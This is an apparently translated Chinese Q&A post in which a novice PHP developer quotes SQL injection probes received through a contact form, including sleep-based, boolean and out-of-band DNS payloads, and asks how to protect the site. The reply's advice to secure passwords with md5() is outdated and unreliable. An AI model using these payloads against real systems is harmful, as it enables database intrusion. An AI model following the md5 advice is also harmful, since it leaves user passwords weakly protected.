PHP中的代码或消息无效

Question

我是PHP开发的新手。我使用PHP，HTML＆amp; amp;创建了一个网站。有联系我们页面的Css。从过去几天开始，来自特定国家/地区的某个人（我不想提及国家/地区名称）正在创建支持消息并输入一些不寻常或可疑的消息。

联系人有四个字段，如全名，电子邮件，主题和＆amp;信息。 有人发送消息，如

1st:
written as "Subject" & (select(0)from(select(sleep(6)))v)/*'+ 
(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

2nd:
-1' OR 2+582-582-1=0+0+0+1 or '0gX9xp3t'='

3rd:
1iY5zL4R'));select pg_sleep(3); --

4th:
1||UTL_INADDR.get_host_address('dns.'||'sqli.032682.7775.77.a4f00.1.bxss'||'.me')

还有很多，请熟悉PHP或其他人的人告诉我这是怎么回事。另请分享一些我应采取的安全预防措施，以防止任何威胁或黑客攻击。

我使用MYSQLi构建了我的网站，以防止/最小化SQL注入威胁。

Answer 1

您可以采取的几种使表单安全的方法是：-

1. 使用 htmlspecialchars() 来防止 XSS 攻击。
2. 通过 md5() 或其他方法加密密码和其他个人信息。
3. 使用 POST 方法而不是 GET 方法传输机密信息。
4. 请勿通过 URL 传输机密数据。
5. 使用某些工具来防止垃圾邮件机器人的攻击。<​​/li>
6. 如果可能，请添加验证码。

有关更多提示，请查看https://www.thoughtco.com/solutions-to-protect-web-forms-from-spam-3467469。

PS：我也是 PHP 新手，只是分享我的想法！相信它会有所帮助。